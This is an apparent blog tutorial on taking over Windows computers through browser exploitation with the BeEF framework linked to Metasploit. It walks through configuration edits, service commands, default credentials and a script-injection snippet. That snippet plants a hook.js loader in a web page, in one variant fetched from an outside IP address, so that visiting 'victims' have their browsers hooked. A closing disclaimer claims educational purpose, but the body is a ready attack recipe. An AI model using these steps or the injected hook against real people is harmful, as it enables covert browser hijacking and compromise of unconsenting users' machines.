Owning windows PC using beef and metasploit

Today I will show you how to own a windows operating system using a technique called browser explotition, to carry out this technique you need a pentration testing distro for example Kali with beef framework and metasploit.

First thing we need to fireup our linux distro and run beef framework plus we need to integrate metasploit with beef-xss framework to do so follow the following commands:

Step One

• Open up a terminal and type in: nano /usr/share/beef-xss/config.yaml
• scroll down to
  • metasploit:
                enable: false <– change it to true

  

   

• save Press Ctrl+X to save the file

Step Two

Now in the same terminal do the following steps:

• Type in nano extensions/metasploit/config.yaml
• change user & pass to the one that you use

• Scroll down and change msf_path to your metasploit path

• save Press Ctrl+X to save the file

Step Three

open up a new terminal and type:

/etc/init.d/postgresql restart && /etc/init.d/metasploit restart

after that type in msfconsole and wait until it loads then type

load msgrpc ServerHost=127.0.0.1 Pass=abc123

Now lunch beef frame work by opening a terminal and navigating to:

/usr/share/beef-xss

and type: ./beef

If you do the steps correctly you will get Successful connection with Metasploit

Step Four

Open your browser and navigate to: https://127.0.0.1:3000/ui/authentication

Username: beef

Password: beef

Now to own a windows PC you have use the following hook.js file and insert it to your index page or you can use one of the demo pages that beef has.

<script>
        var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
        document.write(commandModuleStr);
    </script>

When your victim visit the page or the site you will have there IP Address on the online browser.

P.S you can use your IP Address instead of the that code by doing so:

<script src=”https://123.123.123.123/hook.js”></script>

** Disclaimer **

Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator is responsible for the comments posted on this website.